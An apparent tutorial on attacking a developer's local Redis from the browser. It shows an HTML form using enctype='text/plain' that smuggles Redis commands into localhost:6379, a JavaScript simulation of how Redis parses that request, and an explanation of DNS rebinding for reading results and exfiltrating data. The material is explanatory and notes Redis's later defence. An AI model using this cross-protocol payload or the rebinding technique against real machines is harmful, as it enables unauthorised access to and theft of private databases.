How to steal a developer's local database

The HTML Form Protocol Attack

This uses the enctype="text/plain" trick. (Ref - Paper - The HTML Form Protocol Attack)

<form enctype="text/plain" method="POST" action="http://localhost:6379">
<textarea name="abc">

SET abc 123
</textarea>
<input type="submit" value="Submit" />
</form>

When the server receives the request, it consumes it line by line: Redis's inline protocol treats every line as a command, so the HTTP request line and headers are rejected as unknown commands (the connection stays open), while the line "SET abc 123" from the textarea is executed. (Ref - The HTML Form Protocol Attack.) Note that Redis 3.2.7 and later recognise a "command" named POST or Host: as a cross-protocol attack and close the connection immediately, so this only works against older or unpatched instances.
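To make the mechanism concrete, here is an added example (not code from the original post): it builds the exact bytes a browser sends for the text/plain form above and feeds them to a toy, line-oriented model of Redis's inline protocol (SET/GET only, written for this example). The request, the host name and the toy server are constructed here; the optional guard mimics the cross-protocol check that real Redis applies.

```javascript
// enctype="text/plain" serialises each field as "name=value" followed by CRLF
// and applies no escaping, so a newline inside a <textarea> value starts a new
// line in the body (browsers normalise textarea newlines to CRLF).
function textPlainBody(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// The request line and headers the browser emits before that body. A text/plain
// POST is a CORS "simple request", so no preflight stands in the way.
function buildRequest(host, body) {
  return (
    "POST / HTTP/1.1\r\n" +
    `Host: ${host}\r\n` +
    "Content-Type: text/plain\r\n" +
    `Content-Length: ${Buffer.byteLength(body)}\r\n` +
    "\r\n" +
    body
  );
}

// Toy model of Redis's inline protocol (not Redis itself): each CRLF-terminated
// line is split on whitespace and run as a command; empty lines are ignored; an
// unknown command gets an error reply but the connection stays open, so later
// lines still run. With crossProtocolGuard on, the model behaves like
// Redis >= 3.2.7 and drops the connection on a command named POST or Host:.
function inlineProtocolServer(raw, { crossProtocolGuard = false } = {}) {
  const store = new Map();
  const replies = [];
  for (const line of raw.split("\r\n")) {
    if (line.trim() === "") continue;
    const [cmd, ...args] = line.trim().split(/\s+/);
    const name = cmd.toUpperCase();
    if (crossProtocolGuard && (name === "POST" || name === "HOST:")) {
      replies.push("-ERR possible cross-protocol scripting attack, connection closed");
      break;
    }
    if (name === "SET" && args.length === 2) {
      store.set(args[0], args[1]);
      replies.push("+OK");
    } else if (name === "GET" && args.length === 1) {
      replies.push(store.has(args[0]) ? `$${store.get(args[0])}` : "$-1");
    } else {
      replies.push(`-ERR unknown command '${cmd}'`);
    }
  }
  return { store, replies };
}

// Constructed sample: the form above submitted to a Redis on localhost:6379.
// The textarea value begins with CRLF so that "abc=" sits on a line of its own
// and "SET abc 123" arrives as a complete, separate line.
function demo(opts) {
  const body = textPlainBody([["abc", "\r\nSET abc 123"]]);
  return inlineProtocolServer(buildRequest("localhost:6379", body), opts);
}
```

Running demo() without the guard yields four errors for the HTTP request line and headers, one for "abc=", and then "+OK" with abc=123 stored; with the guard enabled the first line already closes the connection and nothing is written.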

However, while we can execute any command, we can't actually read the result. The browser's same-origin policy ensures that a page cannot read the response to a request sent to another origin. That's where the second technique comes in!

DNS Rebinding

DNS rebinding attacks subvert the same-origin policy by confusing the browser into aggregating network resources controlled by distinct entities into one origin, effectively converting browsers into open proxies.

Using DNS rebinding, an attacker can circumvent firewalls to spider corporate intranets, exfiltrate sensitive documents, and compromise unpatched internal machines. An attacker can also hijack the IP address of innocent clients to send spam e-mail, commit click fraud, and frame clients for misdeeds.

DNS rebinding vulnerabilities permit the attacker to read and write directly on network sockets, subsuming the attacks possible with existing JavaScript-based botnets, which can send HTTP requests but cannot read back the responses.

Same-origin policy


  1. Different path but the same scheme, domain and port: these satisfy the same-origin rule, so the resources can reference each other.
  2. Different port: not the same origin.
  3. Different domain name: not the same origin.


